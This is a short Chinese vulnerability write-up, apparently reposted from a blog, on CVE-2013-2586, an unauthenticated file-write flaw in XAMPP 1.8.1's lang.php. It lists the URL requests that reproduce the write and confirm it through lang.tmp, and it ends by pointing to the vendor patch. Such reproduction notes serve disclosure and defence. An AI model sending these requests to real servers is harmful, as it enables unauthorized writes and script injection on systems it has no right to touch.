xampp-文件写入(CVE-2013-2586)

2023-12-28 11:00:15

漏洞描述:

XAMPP 1.8.1的"/xampp/lang.php"页面存在注入漏洞,未授权用户可在本地磁盘内写入,本地文件 "lang.tmp"可以从远程机器上进行修改,可在目标用户浏览器中执行任意HTML或脚本代码,窃取用户凭证之类的敏感信息

复现过程:

  1. 访问ip:port

2.访问http://ip:port/xampp/lang.php?WriteIntoLocalDisk

3.访问http://ip:port/xampp/lang.tmp

回显WriteIntoLocalDisk

说明写入成功

4.?回到http://ip:port/xampp/splash.php

点击中文进入

5.?点击phpinfo()

修复建议:

厂商补丁:

xampp
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.apachefriends.org/zh_cn/xampp.html

文章来源:https://blog.csdn.net/m0_65150886/article/details/135249137
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。